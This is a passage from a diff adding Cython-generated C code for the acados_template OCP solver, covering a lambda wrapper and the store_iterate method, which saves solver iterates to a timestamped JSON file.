*__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("lambda (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_x,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_x)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 326, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "lambda") < 0)) __PYX_ERR(0, 326, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_x = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("lambda", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 326, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.store_iterate.lambda", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_lambda_funcdef_lambda(__pyx_self, __pyx_v_x); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_lambda_funcdef_lambda(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_x) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("lambda", 0); + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_v_x, __pyx_n_s_tolist); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 326, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_3, }; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 0+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 326, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.store_iterate.lambda", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":293 + * + * + * def store_iterate(self, filename='', overwrite=False): # <<<<<<<<<<<<<< + * """ + * Stores the current iterate of the ocp solver in a json file. + */ + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_18store_iterate(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_filename, PyObject *__pyx_v_overwrite) { + PyObject *__pyx_v_json = NULL; + PyObject *__pyx_v_solution = NULL; + PyObject *__pyx_v_i = NULL; + PyObject *__pyx_v_f = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + PyObject *__pyx_t_7 = NULL; + Py_ssize_t __pyx_t_8; + PyObject *(*__pyx_t_9)(PyObject *); + PyObject *__pyx_t_10 = NULL; + PyObject *__pyx_t_11 = NULL; + PyObject *__pyx_t_12 = NULL; + PyObject *__pyx_t_13 = NULL; + PyObject *__pyx_t_14 = NULL; + PyObject *__pyx_t_15 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("store_iterate", 0); + __Pyx_INCREF(__pyx_v_filename); + + /* "acados_template/acados_ocp_solver_pyx.pyx":300 + * :param overwrite: if false and filename exists add timestamp to filename + * """ + * import json # <<<<<<<<<<<<<< + * if filename == '': + * filename += self.model_name + '_' + 'iterate' + '.json' + */ + __pyx_t_1 = __Pyx_ImportDottedModule(__pyx_n_s_json, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 300, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_json = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":301 + * """ + * import json + * if filename == '': # <<<<<<<<<<<<<< + * filename += self.model_name + '_' + 'iterate' + '.json' + * + */ + __pyx_t_2 = (__Pyx_PyUnicode_Equals(__pyx_v_filename, __pyx_kp_u__14, Py_EQ)); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 301, __pyx_L1_error) + if (__pyx_t_2) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":302 + * import json + * if filename == '': + * filename += self.model_name + '_' + 'iterate' + '.json' # <<<<<<<<<<<<<< + * + * if not overwrite: + */ + __pyx_t_1 = __Pyx_PyUnicode_ConcatSafe(__pyx_v_self->model_name, __pyx_n_u__15); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 302, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyUnicode_ConcatInPlace(__pyx_t_1, __pyx_n_u_iterate); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 302, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyUnicode_ConcatInPlace(__pyx_t_3, __pyx_kp_u_json_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 302, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = PyNumber_InPlaceAdd(__pyx_v_filename, __pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 302, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF_SET(__pyx_v_filename, __pyx_t_3); + __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":301 + * """ + * import json + * if filename == '': # <<<<<<<<<<<<<< + * filename += self.model_name + '_' + 'iterate' + '.json' + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":304 + * filename += self.model_name + '_' + 'iterate' + '.json' + * + * if not overwrite: # <<<<<<<<<<<<<< + * # append timestamp + * if os.path.isfile(filename): + */ + __pyx_t_2 = __Pyx_PyObject_IsTrue(__pyx_v_overwrite); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 304, __pyx_L1_error) + __pyx_t_4 = (!__pyx_t_2); + if (__pyx_t_4) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":306 + * if not overwrite: + * # append timestamp + * if os.path.isfile(filename): # <<<<<<<<<<<<<< + * filename = filename[:-5] + * filename += datetime.utcnow().strftime('%Y-%m-%d-%H:%M:%S.%f') + '.json' + */ + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_os); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 306, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_path); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 306, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_isfile); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 306, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_5, __pyx_v_filename}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_6, 1+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 306, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_3); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 306, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (__pyx_t_4) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":307 + * # append timestamp + * if os.path.isfile(filename): + * filename = filename[:-5] # <<<<<<<<<<<<<< + * filename += datetime.utcnow().strftime('%Y-%m-%d-%H:%M:%S.%f') + '.json' + * + */ + __pyx_t_3 = __Pyx_PyObject_GetSlice(__pyx_v_filename, 0, -5L, NULL, NULL, &__pyx_slice__16, 0, 1, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 307, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF_SET(__pyx_v_filename, __pyx_t_3); + __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":308 + * if os.path.isfile(filename): + * filename = filename[:-5] + * filename += datetime.utcnow().strftime('%Y-%m-%d-%H:%M:%S.%f') + '.json' # <<<<<<<<<<<<<< + * + * # get iterate: + */ + __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_datetime); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 308, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_utcnow); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 308, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_7))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_7); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_7); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_7, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_5, }; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_7, __pyx_callargs+1-__pyx_t_6, 0+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 308, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + } + __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_strftime); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 308, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_7))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_7); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_7); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_7, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_kp_u_Y_m_d_H_M_S_f}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_7, __pyx_callargs+1-__pyx_t_6, 1+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 308, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + } + __pyx_t_7 = PyNumber_Add(__pyx_t_3, __pyx_kp_u_json_2); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 308, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = PyNumber_InPlaceAdd(__pyx_v_filename, __pyx_t_7); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 308, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF_SET(__pyx_v_filename, __pyx_t_3); + __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":306 + * if not overwrite: + * # append timestamp + * if os.path.isfile(filename): # <<<<<<<<<<<<<< + * filename = filename[:-5] + * filename += datetime.utcnow().strftime('%Y-%m-%d-%H:%M:%S.%f') + '.json' + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":304 + * filename += self.model_name + '_' + 'iterate' + '.json' + * + * if not overwrite: # <<<<<<<<<<<<<< + * # append timestamp + * if os.path.isfile(filename): + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":311 + * + * # get iterate: + * solution = dict() # <<<<<<<<<<<<<< + * + * for i in range(self.N+1): + */ + __pyx_t_3 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 311, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_v_solution = ((PyObject*)__pyx_t_3); + __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":313 + * solution = dict() + * + * for i in range(self.N+1): # <<<<<<<<<<<<<< + * solution['x_'+str(i)] = self.get(i,'x') + * solution['u_'+str(i)] = self.get(i,'u') + */ + __pyx_t_3 = __Pyx_PyInt_From_long((__pyx_v_self->N + 1)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 313, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_7 = __Pyx_PyObject_CallOneArg(__pyx_builtin_range, __pyx_t_3); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 313, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (likely(PyList_CheckExact(__pyx_t_7)) || PyTuple_CheckExact(__pyx_t_7)) { + __pyx_t_3 = __pyx_t_7; __Pyx_INCREF(__pyx_t_3); __pyx_t_8 = 0; + __pyx_t_9 = NULL; + } else { + __pyx_t_8 = -1; __pyx_t_3 = PyObject_GetIter(__pyx_t_7); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 313, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_9 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_3); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 313, __pyx_L1_error) + } + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + for (;;) { + if (likely(!__pyx_t_9)) { + if (likely(PyList_CheckExact(__pyx_t_3))) { + if (__pyx_t_8 >= PyList_GET_SIZE(__pyx_t_3)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_7 = PyList_GET_ITEM(__pyx_t_3, __pyx_t_8); __Pyx_INCREF(__pyx_t_7); __pyx_t_8++; if (unlikely((0 < 0))) __PYX_ERR(0, 313, __pyx_L1_error) + #else + __pyx_t_7 = PySequence_ITEM(__pyx_t_3, __pyx_t_8); __pyx_t_8++; if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 313, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + #endif + } else { + if (__pyx_t_8 >= PyTuple_GET_SIZE(__pyx_t_3)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_7 = PyTuple_GET_ITEM(__pyx_t_3, __pyx_t_8); __Pyx_INCREF(__pyx_t_7); __pyx_t_8++; if (unlikely((0 < 0))) __PYX_ERR(0, 313, __pyx_L1_error) + #else + __pyx_t_7 = PySequence_ITEM(__pyx_t_3, __pyx_t_8); __pyx_t_8++; if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 313, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + #endif + } + } else { + __pyx_t_7 = __pyx_t_9(__pyx_t_3); + if (unlikely(!__pyx_t_7)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(0, 313, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_7); + } + __Pyx_XDECREF_SET(__pyx_v_i, __pyx_t_7); + __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":314 + * + * for i in range(self.N+1): + * solution['x_'+str(i)] = self.get(i,'x') # <<<<<<<<<<<<<< + * solution['u_'+str(i)] = self.get(i,'u') + * solution['z_'+str(i)] = self.get(i,'z') + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 314, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_5, __pyx_v_i, __pyx_n_u_x}; + __pyx_t_7 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 314, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_1 = __Pyx_PyObject_Str(__pyx_v_i); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 314, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = PyNumber_Add(__pyx_n_u_x_2, __pyx_t_1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 314, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely((PyDict_SetItem(__pyx_v_solution, __pyx_t_5, __pyx_t_7) < 0))) __PYX_ERR(0, 314, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":315 + * for i in range(self.N+1): + * solution['x_'+str(i)] = self.get(i,'x') + * solution['u_'+str(i)] = self.get(i,'u') # <<<<<<<<<<<<<< + * solution['z_'+str(i)] = self.get(i,'z') + * solution['lam_'+str(i)] = self.get(i,'lam') + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 315, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_1, __pyx_v_i, __pyx_n_u_u}; + __pyx_t_7 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 315, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + __pyx_t_5 = __Pyx_PyObject_Str(__pyx_v_i); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 315, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = PyNumber_Add(__pyx_n_u_u_2, __pyx_t_5); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 315, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely((PyDict_SetItem(__pyx_v_solution, __pyx_t_1, __pyx_t_7) < 0))) __PYX_ERR(0, 315, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":316 + * solution['x_'+str(i)] = self.get(i,'x') + * solution['u_'+str(i)] = self.get(i,'u') + * solution['z_'+str(i)] = self.get(i,'z') # <<<<<<<<<<<<<< + * solution['lam_'+str(i)] = self.get(i,'lam') + * solution['t_'+str(i)] = self.get(i, 't') + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 316, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_5, __pyx_v_i, __pyx_n_u_z}; + __pyx_t_7 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 316, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_1 = __Pyx_PyObject_Str(__pyx_v_i); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 316, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = PyNumber_Add(__pyx_n_u_z_2, __pyx_t_1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 316, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely((PyDict_SetItem(__pyx_v_solution, __pyx_t_5, __pyx_t_7) < 0))) __PYX_ERR(0, 316, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":317 + * solution['u_'+str(i)] = self.get(i,'u') + * solution['z_'+str(i)] = self.get(i,'z') + * solution['lam_'+str(i)] = self.get(i,'lam') # <<<<<<<<<<<<<< + * solution['t_'+str(i)] = self.get(i, 't') + * solution['sl_'+str(i)] = self.get(i, 'sl') + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 317, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_1)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_1); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_1, __pyx_v_i, __pyx_n_u_lam}; + __pyx_t_7 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_6, 2+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 317, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + __pyx_t_5 = __Pyx_PyObject_Str(__pyx_v_i); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 317, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = PyNumber_Add(__pyx_n_u_lam_2, __pyx_t_5); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 317, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely((PyDict_SetItem(__pyx_v_solution, __pyx_t_1, __pyx_t_7) < 0))) __PYX_ERR(0, 317, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":318 + * solution['z_'+str(i)] = self.get(i,'z') + * solution['lam_'+str(i)] = self.get(i,'lam') + * solution['t_'+str(i)] = self.get(i, 't') # <<<<<<<<<<<<<< + * solution['sl_'+str(i)] = self.get(i, 'sl') + * solution['su_'+str(i)] = self.get(i, 'su') + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_get); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 318, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_5, __pyx_v_i, __pyx_n_u_t}; + __pyx_t_7 = 